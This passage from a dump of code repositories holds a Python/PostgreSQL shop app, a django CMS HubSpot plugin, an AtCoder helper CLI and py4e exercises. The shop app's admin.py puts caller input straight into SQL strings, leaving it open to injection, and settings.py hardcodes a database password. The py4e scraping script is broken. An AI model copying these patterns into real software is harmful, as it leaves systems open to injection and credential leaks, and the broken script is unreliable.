"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 4,
"path": "/settings.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "USER = 'postgres'\nPASSWORD = 'DBP@$$w0Rd' #your password\nHOST = '127.0.0.1'\nPORT = '5432'\n"
},
{
"alpha_fraction": 0.5432178974151611,
"alphanum_fraction": 0.5493687391281128,
"avg_line_length": 31.840425491333008,
"blob_id": "1ed289dbff3e735c03520ce7b72b98ed0cdfe3bb",
"content_id": "ba688ab2bbd6fca7ce7ea8eb22bc8b792a157070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3089,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 94,
"path": "/admin.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\nimport datetime\n\nclass Admin(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n\n def register_self(self):\n self.register( self.login, self.password, 'adm')\n \n def login_self(self):\n return self.login_check(self.login,self.password, 'adm')\n\n def get_order_info(self, category = '', selector = '', ):\n \"\"\"\n category must be one of the item from the list:\n ['city_name','date_of_order', 'product_name']\n\n date format for selector: 2020-6-12\n \"\"\"\n if self.login_self():\n categoryes = ['city_name','date_of_order', 'product_name', 'status']\n table = ('orders o',)\n fields = (\"\"\"o.id, concat(e.first_name,' ', e.last_name) as \"employee\", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as \"customer\", p.product_name, o.price \"\"\",)\n if category and category in categoryes and selector != '':\n selector = selector if isinstance(selector, bool) == bool else str(selector)\n where = f\"\"\"where {category} = {selector}\"\"\"\n else:\n where = ''\n selector = f\"\"\" left JOIN employee e on e.id = o.employee_id \n left JOIN city c on c.id = o.city_id \n left JOIN customer c2 on c2.id = o.customer_id \n left JOIN product p on p.id = o.product_id {where}\"\"\"\n result = self.getData(table, fields, selector)\n fieldNames = [\"id\", \"employee\", \"city_name\",\"date_of_order\", \"customer\", \"product_name\", \"price\" ]\n changeRes = []\n for item in result:\n cort = {}\n for index,element in enumerate(item):\n cort[fieldNames[index]]=element\n changeRes.append(cort)\n else:\n changeRes = \"Invalid loging!\"\n return changeRes\n\n\n\n def add_pr_category(self, data):\n table = 'product_category'\n result = self._postData(table, data)\n return result\n\n def edit_pr_category(self, data, selector):\n table = 'product_category'\n result = self.updateData(table, data, selector)\n return result\n\n def delete_pr_category(self, selector):\n table = 'product_category'\n selector = f\"category_name = '{selector}'\"\n result = self.deleteData(table,selector)\n return result\n\n\n\n\n\nif __name__ == '__main__':\n\n admin1 = Admin('Admin1', '1234')\n # orders = admin1.get_order_info()\n # print(orders)\n data = [{\n 'category_name': \"Beer\"\n },\n ]\n put = admin1.add_pr_category(data)\n print(put)\n\n \n # data = {\n # 'category_name': \"Water\"\n # }\n # edit = admin1.edit_pr_category(data, \"category_name = 'Rom'\")\n # print(edit)\n # id = admin1.getNextId('product_category')\n # print(id)\n\n # dele = admin1.delete_pr_category('Beer')\n # print(dele)\n\n\n"
},
{
"alpha_fraction": 0.676706850528717,
"alphanum_fraction": 0.718875527381897,
"avg_line_length": 21.68181800842285,
"blob_id": "439134cf6f4856facca95f738a1dd14c4cc9a8da",
"content_id": "e96bd3102e0f0fc1607a62aceed4d0289a914aa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/app.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "from admin import Admin\nfrom customer import Customer\nfrom pprint import pprint\nimport datetime\nfrom custom import respprint\n\nadmin1 = Admin('Admin2', '1111')\n# admin1.register_self()\n\norders = admin1.get_order_info(category='status', selector=False)\n\nrespprint(orders)\n\n\n# print(admin1.login_self())\n\n\n# customer2 = Customer('kate', '1111')\n# # customer2.register_self('Kate', 'Kat', 2)\n# customer2.login_self()\n# # print(customer2.first_name)\n# customer2.create_order([('Apple',2,), ('Meat', 5)])"
},
{
"alpha_fraction": 0.6060606241226196,
"alphanum_fraction": 0.6130536198616028,
"avg_line_length": 24.294116973876953,
"blob_id": "e449dea53a3e2bbed176edeb752afd24db52bc32",
"content_id": "03bf3d0ae26dc411d4caf2a0e49487b7f3ea63a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 17,
"path": "/fill_table.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT, \n database = 'shop_db')\n\ncursor = connection.cursor()\ncursor.execute('SELECT * FROM employee WHERE city_id = 3;')\n\nresponse = cursor.fetchall()\n# print(response)\nfor item in response:\n print(item)\n\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.45879119634628296,
"alphanum_fraction": 0.4780219793319702,
"avg_line_length": 25.071428298950195,
"blob_id": "a910b4d6d4fb9b54bf6c95e3039bc3c07b24b51b",
"content_id": "a181b9f500559bb8ce5709eff50637b331cea401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 14,
"path": "/custom.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import datetime\n\ndef respprint(obj):\n if type(obj) == str:\n print(obj)\n else:\n keys = list(obj[0].keys())\n for item in keys:\n print(\"{0:20s}\".format(item), end='')\n print()\n for item in obj:\n for element in item:\n print(\"{0:20s}\".format(str(item[element])), end='') \n print()"
}
] | 9 |
Blueshoe/djangocms-hubspot
|
https://github.com/Blueshoe/djangocms-hubspot
|
f0809ebcde6e61c2288b7c1039a9f65b9cdfc1bc
|
6f8a5e344624615dcb129be504c0db71345b0c30
|
fc6bec6035df3c4e0045f00d0cace3786e59e575
|
refs/heads/master
| 2022-05-02T17:09:23.568398 | 2022-03-03T10:16:47 | 2022-03-03T10:16:47 | 215,992,107 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8447204828262329,
"alphanum_fraction": 0.8447204828262329,
"avg_line_length": 25.83333396911621,
"blob_id": "5bd64c777d012fab9509a77557ddbb654c1f5d7b",
"content_id": "e8d5e0958164cbc8302fa339373ccbc6cb3de11a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/djangocms_hubspot/admin.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom djangocms_hubspot.models import HubspotForm, HubspotCTA\n\nadmin.site.register(HubspotForm)\nadmin.site.register(HubspotCTA)\n"
},
{
"alpha_fraction": 0.6075144410133362,
"alphanum_fraction": 0.6144508719444275,
"avg_line_length": 22.066667556762695,
"blob_id": "6bbca7e5f992be520cb808e06406a5d449c8964f",
"content_id": "8e1b7deee93c75c738d6288f1b14e9db4ba90ff9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1730,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 75,
"path": "/djangocms_hubspot/models.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom cms.models import CMSPlugin\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom six import python_2_unicode_compatible\n\n\n@python_2_unicode_compatible\nclass HubspotForm(models.Model):\n name = models.CharField(\n max_length=300,\n help_text=_('Name of the form. This is just to identify the form when you want to place it into a page.'),\n blank=False,\n null=False,\n )\n\n embed_code = models.TextField(\n blank=False,\n null=False,\n )\n\n class Meta:\n verbose_name = _('Hubspot form')\n verbose_name_plural = _('Hubspot forms')\n\n def __str__(self):\n return self.name\n\n\n@python_2_unicode_compatible\nclass HubspotCTA(models.Model):\n name = models.CharField(\n max_length=300,\n help_text=_('Name of the CTA. This is just to identify the CTA when you want to place it into a page.'),\n blank=False,\n null=False,\n )\n\n embed_code = models.TextField(\n blank=False,\n null=False,\n )\n\n class Meta:\n verbose_name = _('Hubspot CTA')\n verbose_name_plural = _('Hubspot CTAs')\n\n def __str__(self):\n return self.name\n\n\n@python_2_unicode_compatible\nclass HubspotFormPluginModel(CMSPlugin):\n form = models.ForeignKey(\n 'HubspotForm',\n blank=False,\n null=False,\n on_delete=models.CASCADE\n )\n\n def __str__(self):\n return self.form.name\n\n\n@python_2_unicode_compatible\nclass HubspotCTAPluginModel(CMSPlugin):\n cta = models.ForeignKey(\n 'HubspotCTA',\n blank=False,\n null=False,\n on_delete=models.CASCADE\n )\n\n def __str__(self):\n return self.cta.name\n"
},
{
"alpha_fraction": 0.7483516335487366,
"alphanum_fraction": 0.7494505643844604,
"avg_line_length": 30.379310607910156,
"blob_id": "54ce1aaa383447670aa3f4397ebb2c49c1815ac4",
"content_id": "7868562a05f0de6677a10deac89fd9f3b078235a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 29,
"path": "/djangocms_hubspot/cms_plugins.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom djangocms_hubspot.forms import HubspotFormPluginForm, HubspotCTAPluginForm\nfrom djangocms_hubspot.models import HubspotFormPluginModel, HubspotCTAPluginModel\nfrom django.utils.translation import gettext_lazy as _\n\n\n@plugin_pool.register_plugin\nclass HubspotFormPlugin(CMSPluginBase):\n model = HubspotFormPluginModel\n form = HubspotFormPluginForm\n name = _('Hubspot Form')\n module = _('Hubspot')\n render_template = 'djangocms_hubspot/plugins/form.html'\n cache = True\n text_enabled = True\n\n\n@plugin_pool.register_plugin\nclass HubspotCTAPlugin(CMSPluginBase):\n model = HubspotCTAPluginModel\n form = HubspotCTAPluginForm\n name = _('Hubspot CTA')\n module = _('Hubspot')\n render_template = 'djangocms_hubspot/plugins/cta.html'\n cache = True\n text_enabled = True\n"
},
{
"alpha_fraction": 0.5571061372756958,
"alphanum_fraction": 0.5717958211898804,
"avg_line_length": 41.546875,
"blob_id": "25c35da94021c4b9227623ce559ee3f6db95846b",
"content_id": "5da1661bb14649c092923329a2b320f83cc67791",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2723,
"license_type": "permissive",
"max_line_length": 250,
"num_lines": 64,
"path": "/djangocms_hubspot/migrations/0001_initial.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.15 on 2019-10-18 08:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HubspotCTA',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Name of the CTA. This is just to identify the CTA when you want to place it into a page.', max_length=300)),\n ('embed_code', models.TextField()),\n ],\n options={\n 'verbose_name': 'Hubspot CTA',\n 'verbose_name_plural': 'Hubspot CTAs',\n },\n ),\n migrations.CreateModel(\n name='HubspotCTAPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_hubspot_hubspotctapluginmodel', serialize=False, to='cms.CMSPlugin')),\n ('cta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='djangocms_hubspot.HubspotCTA')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n migrations.CreateModel(\n name='HubspotForm',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Name of the form. This is just to identify the form when you want to place it into a page.', max_length=300)),\n ('embed_code', models.TextField()),\n ],\n options={\n 'verbose_name': 'Hubspot form',\n 'verbose_name_plural': 'Hubspot forms',\n },\n ),\n migrations.CreateModel(\n name='HubspotFormPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_hubspot_hubspotformpluginmodel', serialize=False, to='cms.CMSPlugin')),\n ('form', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='djangocms_hubspot.HubspotForm')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 40,
"blob_id": "af6ecbb99c2c90d6236923f93e36d88247dd42da",
"content_id": "cae6ac92ca42e425c7eb29129a4a4cfdefc4e4c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 82,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 2,
"path": "/djangocms_hubspot/__init__.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "__version__ = '0.2.0'\ndefault_app_config = 'djangocms_hubspot.apps.HubspotConfig'\n"
},
{
"alpha_fraction": 0.6595744490623474,
"alphanum_fraction": 0.6595744490623474,
"avg_line_length": 10.75,
"blob_id": "3acf52e40aff18baf7d362f79bc2e79fbca61383",
"content_id": "10e15326b9436e0aa838d7e864fbea8f8e51d6fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 47,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 4,
"path": "/scripts/build.sh",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nrm -rf dist/*\npython setup.py sdist\n"
},
{
"alpha_fraction": 0.6527777910232544,
"alphanum_fraction": 0.65625,
"avg_line_length": 15,
"blob_id": "353ce6f0764da5bd682662b0f1d06da932582a29",
"content_id": "364d2500256499a219af2603243c89c6041fa6de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 36,
"path": "/README.md",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# django CMS Hubspot\n\n\nA plugin for django CMS which makes integrating HubSpot easier.\n\nIt creates plugins for:\n\n- Forms\n- CTAs\n\nForms and CTAs are manually added to the CMS and can then be selected whenever inserting a form/CTA into a page.\n\n\n## Installation\n\n\n- install with `pip`:\n\n `$ pip install djangocms-hubspot`\n\n\n- add the django app to `INSTALLED_APPS` in your settings file:\n```\n INSTALLED_APPS = (\n ...\n 'django_select2',\n 'djangocms_hubspot',\n ...\n )\n```\n\n- run `python manage.py migrate`.\n\n\n### Dependencies\n- django-select2\n"
},
{
"alpha_fraction": 0.6507936716079712,
"alphanum_fraction": 0.6578482985496521,
"avg_line_length": 23.65217399597168,
"blob_id": "1d8af512509ed1e87c339fdbed89058b73ba7866",
"content_id": "12b6c77073a6a7ebaf32ee76f42199019c1e7a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 23,
"path": "/djangocms_hubspot/forms.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nfrom django_select2.forms import Select2Widget\n\nfrom djangocms_hubspot.models import HubspotFormPluginModel, HubspotCTAPluginModel, HubspotForm, HubspotCTA\n\n\nclass HubspotFormPluginForm(forms.ModelForm):\n class Meta:\n model = HubspotFormPluginModel\n fields = '__all__'\n widgets = {\n 'form': Select2Widget\n }\n\n\nclass HubspotCTAPluginForm(forms.ModelForm):\n class Meta:\n model = HubspotCTAPluginModel\n fields = '__all__'\n widgets = {\n 'cta': Select2Widget\n }\n"
}
] | 8 |
kenji-miyake/atcoder-helper
|
https://github.com/kenji-miyake/atcoder-helper
|
7f23c9dce38ff2eaeddbc02c58d219eca5b1760b
|
6acf29281b9eeb0646cbf14e77950b4988610689
|
14d0ebb1d8e0a1bb46318730bf5b2a6ddd009c7b
|
refs/heads/master
| 2023-02-23T20:00:58.042598 | 2021-01-31T06:58:16 | 2021-01-31T06:58:16 | 198,219,177 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5771230459213257,
"alphanum_fraction": 0.6533795595169067,
"avg_line_length": 20.370370864868164,
"blob_id": "b54c1976c2a33b4d21f1ae0bdd272d433e0d880d",
"content_id": "0c96a089a284c88d59c60055855ab0559ff0b66c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 577,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 27,
"path": "/pyproject.toml",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"atcoder-helper\"\nversion = \"0.3.0\"\ndescription = \"Simple CLI helper tool for AtCoder\"\nauthors = [\"Kenji Miyake <[email protected]>\"]\nlicense = \"MIT\"\n\n[tool.poetry.dependencies]\npython = \"^3.9\"\nargcomplete = \"^1.12.2\"\nrequests = \"^2.25.1\"\nbeautifulsoup4 = \"^4.9.3\"\n\n[tool.poetry.dev-dependencies]\nipython = \"^7.19.0\"\nflake8 = \"^3.8.4\"\npep8-naming = \"^0.11.1\"\nmypy = \"^0.790\"\nblack = \"^20.8b1\"\nisort = \"^5.7.0\"\n\n[tool.poetry.scripts]\natcoder-helper = \"atcoder_helper.__main__:main\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n"
},
{
"alpha_fraction": 0.6398744583129883,
"alphanum_fraction": 0.643012285232544,
"avg_line_length": 27.972028732299805,
"blob_id": "47e0b1ca3b72d2b56b51ca942c9e40c72b3b6b69",
"content_id": "1aad8f1d2ec407c2e63391db5aecc5e8194b788d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4143,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 143,
"path": "/atcoder_helper/command/gen.py",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nimport re\nimport shutil\nimport sys\nfrom dataclasses import asdict, dataclass\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport requests\nfrom argcomplete.completers import DirectoriesCompleter, FilesCompleter\nfrom bs4 import BeautifulSoup\n\nlogger = getLogger(__name__)\nlogger.setLevel(\"DEBUG\")\n\natcoder_base_url = \"https://atcoder.jp\"\n\n\n@dataclass(frozen=True)\nclass Task:\n contest_id: str\n task_id: str\n task_url: str\n alphabet: str\n\n\ndef get_page(url):\n try:\n response = requests.get(url)\n except ConnectionError as e:\n logger.error(e)\n sys.exit(1)\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n if response.status_code != requests.codes.ok:\n logger.error(f\"statuc_code was {response.status_code}, please confirm url: {url}\")\n sys.exit(1)\n\n return BeautifulSoup(response.text, \"html.parser\")\n\n\ndef get_tasks(contest_id: str, alphabets: list[str] = None) -> list[Task]:\n page = get_page(f\"{atcoder_base_url}/contests/{contest_id}/tasks\")\n\n tbody = page.find(\"tbody\")\n if not tbody:\n logger.error(\"no tbody found\")\n sys.exit(1)\n\n tasks = []\n for tr in tbody.find_all(\"tr\"):\n tds = tr.find_all(\"td\")\n alphabet = tds[0].text\n task_path = tds[1].find(\"a\").attrs[\"href\"]\n\n task_url = f\"{atcoder_base_url}{task_path}\"\n task_id = Path(task_url).name\n\n if not re.match(r\"[A-Z]\", alphabet):\n continue\n\n if alphabets:\n if alphabet not in alphabets:\n continue\n\n tasks.append(Task(contest_id, task_id, task_url, alphabet))\n\n if not tasks:\n logger.error(\"no task found\")\n sys.exit(1)\n\n return tasks\n\n\ndef generate_task_dir(task: Task, task_dir: Path) -> None:\n logger.debug(f\"make directory: {task_dir}\")\n task_dir.mkdir(parents=True, exist_ok=True)\n\n with open(task_dir / \"task.json\", \"w\") as f:\n json.dump(asdict(task), f)\n\n\ndef copy_template_file(task_dir: Path, template_file: Path) -> None:\n target = task_dir / (\"main\" + template_file.suffix)\n\n if not target.exists():\n shutil.copy(template_file, target)\n else:\n logger.info(f\"template file already exists and was not copied: {target}\")\n\n\ndef get_recent_contest_ids(prefix: str, parsed_args, **kwargs):\n get_params_dict = {}\n if prefix.startswith(\"abc\"):\n get_params_dict[\"ratedType\"] = 1\n if prefix.startswith(\"arc\"):\n get_params_dict[\"ratedType\"] = 2\n if prefix.startswith(\"agc\"):\n get_params_dict[\"ratedType\"] = 3\n\n get_params = \"&\".join([f\"{k}={v}\" for k, v in get_params_dict.items()])\n\n page = get_page(f\"{atcoder_base_url}/contests/archive?{get_params}\")\n tbody = page.find(\"tbody\")\n\n contest_ids = []\n for tr in tbody.find_all(\"tr\"):\n tds = tr.find_all(\"td\")\n contest_id = tds[1].find(\"a\").attrs[\"href\"].replace(\"/contests/\", \"\")\n contest_ids.append(contest_id)\n\n return contest_ids\n\n\ndef get_alphabets_in_contest(prefix: str, parsed_args, **kwargs):\n tasks = get_tasks(parsed_args.contest_id)\n all_alphabets = [task.alphabet for task in tasks]\n return [alphabet for alphabet in all_alphabets if alphabet not in parsed_args.alphabets]\n\n\ndef add_arguments(subparser):\n subparser.add_argument(\"contest_id\", type=str).completer = get_recent_contest_ids\n subparser.add_argument(\"alphabets\", type=str, nargs=\"*\", default=[]).completer = get_alphabets_in_contest\n subparser.add_argument(\"--contests-dir\", type=Path, default=Path(\"./contests\")).completer = DirectoriesCompleter()\n subparser.add_argument(\"--template-file\", type=Path).completer = FilesCompleter()\n\n\ndef main(args):\n tasks = get_tasks(args.contest_id, args.alphabets)\n if not tasks:\n logger.error(f\"do nothing because no task was found\")\n sys.exit(1)\n\n for task in tasks:\n task_dir = args.contests_dir / task.contest_id / task.alphabet\n\n generate_task_dir(task, task_dir)\n\n if args.template_file and args.template_file.exists():\n copy_template_file(task_dir, args.template_file)\n"
},
{
"alpha_fraction": 0.7021968960762024,
"alphanum_fraction": 0.7021968960762024,
"avg_line_length": 25.148935317993164,
"blob_id": "935f46dae78912cf57727898fa715a3d21096479",
"content_id": "32f1436ea326f4e786654e2a0b0af116550181a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 47,
"path": "/atcoder_helper/__main__.py",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nfrom logging import StreamHandler, basicConfig, getLogger\n\nimport argcomplete\nimport pkg_resources\n\nimport atcoder_helper.command.gen\n\nlogger = getLogger(__name__)\nlogger.setLevel(\"DEBUG\")\n\nversion = pkg_resources.get_distribution(\"atcoder-helper\").version\n\n\ndef get_sub_commands():\n return [v for v in vars(atcoder_helper.command) if not v.startswith(\"_\")]\n\n\ndef get_sub_command_module(sub_command):\n return getattr(atcoder_helper.command, sub_command)\n\n\ndef main() -> None:\n handler = StreamHandler()\n handler.setLevel(\"INFO\")\n basicConfig(handlers=[handler])\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {version}\")\n\n subparsers = parser.add_subparsers(dest=\"command\")\n for sub_command in get_sub_commands():\n sub_command_module = get_sub_command_module(sub_command)\n sub_command_module.add_arguments(subparsers.add_parser(sub_command))\n\n argcomplete.autocomplete(parser, exclude=[\"-h\", \"--help\", \"--version\"])\n\n args = parser.parse_args()\n\n sub_command_module = get_sub_command_module(args.command)\n sub_command_module.main(args)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7350993156433105,
"alphanum_fraction": 0.7430463433265686,
"avg_line_length": 19.97222137451172,
"blob_id": "690ebe39379646d2c754df25bd070618bcd9a2cc",
"content_id": "41643f0fcf24c347de824c3a45051c5dd43e1ef0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 755,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 36,
"path": "/README.md",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "# atcoder-helper\n\n## Overview\n\nSimple CLI helper tool for AtCoder\n\n## Installation\n\n- `pip install git+https://github.com/kenji-miyake/atcoder-helper`\n\n## Usage\n\n```sh\natcoder-helper gen [--contests-dir CONTESTS_DIR] [--template-file TEMPLATE_FILE] contest_id [alphabets [alphabets ...]]\n```\n\nTo use command-line completion, please follow the instructions in [argcomplete](https://github.com/kislyuk/argcomplete).\n\nIf you're using fish-shell, please run the following command.\n\n```sh\nregister-python-argcomplete --shell fish atcoder-helper | source\n```\n\n## Example\n\n```sh\n# Create your template file\nvim template.cpp\n\n# Create contest workspace\natcoder-helper gen --template-file template.cpp abc001 A B\n\n# Start coding\nvim contests/abc001/A/main.cpp\n```\n"
}
] | 4 |
andreus42/py4e
|
https://github.com/andreus42/py4e
|
c1c61becb571f7a7e6ee719872630decabc2a7de
|
f49e891b41d8e594d8109545c31e3f961a0b6038
|
f425b94a814986bba211576690ea3ee4a7f367c9
|
refs/heads/master
| 2020-03-19T07:19:31.979555 | 2018-07-10T11:00:29 | 2018-07-10T11:00:29 | 136,105,153 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6563436388969421,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 29.24242401123047,
"blob_id": "3f0bbb01e33cea537b748bbc55ddfc2e6cfc9467",
"content_id": "b9b90e8542d0880f7ee6d2393a53b2d4e5a07e0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 33,
"path": "/_site/10.2.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\n10.2 Write a program to read through the mbox-short.txt and figure out the distribution by hour of the day for each of the messages. You can pull the hour out from the 'From ' line by finding the time and then splitting the string a second time using a colon.\nFrom [email protected] Sat Jan 5 09:14:16 2008\nOnce you have accumulated the counts for each hour, print out the counts, sorted by hour as shown below.\n'''\n\n# name = input(\"Enter file:\")\n# if len(name) < 1 : name = \"mbox-short.txt\"\n\nname = \"mbox-short.txt\"\nhandle = open(name)\n\ncounts = dict()\n\n# Read line, Find \"From\", Strip\nfor line in handle:\n if not line.startswith(\"From \") : continue\n current = (line.rstrip()).split()\n time_list = (current[5]).split(\":\")\n hour = time_list[0]\n \n # Make dictionary for counting\n counts[hour] = counts.get(hour, 0) + 1\n hour_list = list()\n \n #Make in to tuple list for sorting\n for k, v in counts.items() :\n hour_list.append((k, v))\n \nhour_list.sort()\n\nfor k,v in hour_list:\n print(k, v)\n \n"
},
{
"alpha_fraction": 0.7064067125320435,
"alphanum_fraction": 0.7259052991867065,
"avg_line_length": 42.56097412109375,
"blob_id": "cd183381faa343402ff866b3e3c59046a3fd9d14",
"content_id": "eeb0794af0e80609b80b4458776bbc98ffedc5e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1795,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 41,
"path": "/12.6.test.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nWelcome Andrew S Metell from Using Python to Access Web Data\n\nScraping Numbers from HTML using BeautifulSoup In this assignment you will write a Python program similar to http://www.py4e.com/code3/urllink2.py. The program will use urllib to read the HTML from the data files below, and parse the data, extracting numbers and compute the sum of the numbers in the file.\n\nWe provide two files for this assignment. One is a sample file where we give you the sum for your testing and the other is the actual data you need to process for the assignment.\n\nSample data: http://py4e-data.dr-chuck.net/comments_42.html (Sum=2553)\nActual data: http://py4e-data.dr-chuck.net/comments_100091.html (Sum ends with 44)\nYou do not need to save these files to your folder since your program will read the data directly from the URL. Note: Each student will have a distinct data url for the assignment - so only use your own data url for analysis.\n'''\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport ssl\nimport re\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\n# url = input('Enter - ')\nurl = ' http://py4e-data.dr-chuck.net/comments_42.xml'\n# url = 'http://py4e-data.dr-chuck.net/comments_100091.html'\nhtml = urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(xml, \"xml.parser\")\n\nsum = 0\n# Retrieve all of the span tags\ntags = soup('comments')\nfor tag in tags:\n # Look at the parts of a tag\n # print('TAG:', tag)\n # print('URL:', tag.get('href', None))\n # print('Contents:', tag.contents[0])\n # print('Attrs:', tag.attrs)\n #use regex to grab number string, turn to in, add to sum\n nums = re.findall('[0-9]+', tag.contents[0])\n for each in nums :\n sum = sum + int(each)\n print('Sum', sum)\n \n "
},
{
"alpha_fraction": 0.7318037748336792,
"alphanum_fraction": 0.7401107549667358,
